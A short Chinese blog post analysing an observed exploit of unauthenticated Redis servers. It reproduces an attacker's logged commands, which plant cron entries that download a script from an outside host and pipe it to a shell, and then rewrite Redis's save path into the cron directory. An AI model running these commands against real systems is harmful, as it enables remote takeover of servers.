zoukankan html css js c++ java

[日常] 研究redis未授权访问漏洞利用过程

前提:redis允许远程连接,不需要密码

1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "

*/1 * * * * curl cdn.namunil.com/sh.php|sh
"
1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "

*/2 * * * * wget -O- cdn.namunil.com/sh.php|sh
"
1522057495.585023 [0 123.206.24.121:50084] "set" "HoemuOP" "

*/3 * * * * /usr/bin/curl -qs cdn.namunil.com/sh.php|/bin/sh
"
1522057495.585650 [0 123.206.24.121:50084] "set" "ehWap" "

*/4 * * * * /usr/bin/wget -q -O- cdn.namunil.com/sh.php|/bin/sh
"
1522057495.586313 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/"
1522057495.587036 [0 123.206.24.121:50084] "config" "set" "dbfilename" "root"
1522057495.587374 [0 123.206.24.121:50084] "save"
1522057495.587827 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/crontabs/"
1522057495.588235 [0 123.206.24.121:50084] "save"

1.执行set命令,保存字符串,value 是一条cron规则的形式
2.设置备份文件的目录到cron目录
3.设置备份文件的文件名成root
4.save保存文件,直接把字符串中的cron规则写入了文件
5.cron定时执行,远程脚本里面各种操作

查看全文

相关阅读:
8.18 二讲背包问题之完全背包
 8.18 动态规划——背包问题之01背包
 8.17 动态规划——书的抄写
 7.25 二分查找模板
 7.19 股票问题
 7.12 枚举-Jam的计数法
 7.12 递归——双色hanoi塔问题
 7.11 NOIP2007普及组第3题守望者的逃离
 高数之泰勒公式
 数据结构_线性表之链表（1）

原文地址：https://www.cnblogs.com/taoshihan/p/8658866.html